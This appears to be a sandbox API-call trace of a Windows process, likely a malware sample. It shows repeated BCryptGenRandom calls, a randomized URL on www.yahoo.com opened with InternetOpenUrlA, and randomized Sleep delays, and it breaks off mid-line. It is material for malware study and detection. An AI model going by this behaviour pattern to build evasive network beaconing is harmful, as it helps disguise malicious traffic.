[0235.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0235.178] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0235.178] GetProcessHeap () returned 0x440000 [0235.178] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0235.178] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0235.178] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x12, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0235.179] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.179] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.179] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.180] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.180] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.180] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.180] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.180] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.180] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.180] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.180] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.181] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.181] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.181] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.181] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.182] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.182] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.182] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.182] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.182] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.182] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.182] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.183] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0235.183] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b263, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x3a1b263) returned 0x0 [0235.183] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.607] GetProcessHeap () returned 0x440000 [0235.607] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4724e0 [0235.607] lstrcpyA (in: lpString1=0x4724e0, lpString2="4\x08¶:s://www.yahoo.com" | out: lpString1="4\x08¶:s://www.yahoo.com") returned="4\x08¶:s://www.yahoo.com" [0235.607] lstrcatA (in: lpString1="4\x08¶:s://www.yahoo.com", lpString2="/4apilgfa6yeouo5e8/53teux74l6sX0iOja88mz7nfUn/" | out: lpString1="4\x08¶:s://www.yahoo.com/4apilgfa6yeouo5e8/53teux74l6sX0iOja88mz7nfUn/") returned="4\x08¶:s://www.yahoo.com/4apilgfa6yeouo5e8/53teux74l6sX0iOja88mz7nfUn/" [0235.607] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0235.607] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="4\x08¶:s://www.yahoo.com/4apilgfa6yeouo5e8/53teux74l6sX0iOja88mz7nfUn/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0235.608] GetProcessHeap () returned 0x440000 [0235.608] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4724e0 | out: hHeap=0x440000) returned 1 [0235.608] GetProcessHeap () returned 0x440000 [0235.608] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0235.608] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0235.609] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0235.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0235.609] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0235.609] Sleep (dwMilliseconds=0x16640) [0235.873] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0235.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0235.874] GetProcessHeap () returned 0x440000 [0235.874] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0235.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0235.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0235.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.876] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.876] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.876] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.877] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.877] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.877] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0235.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b276, cbBuffer=0x2b, dwFlags=0x2 | out: pbBuffer=0x3a1b276) returned 0x0 [0235.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0235.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0235.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0235.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0235.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: 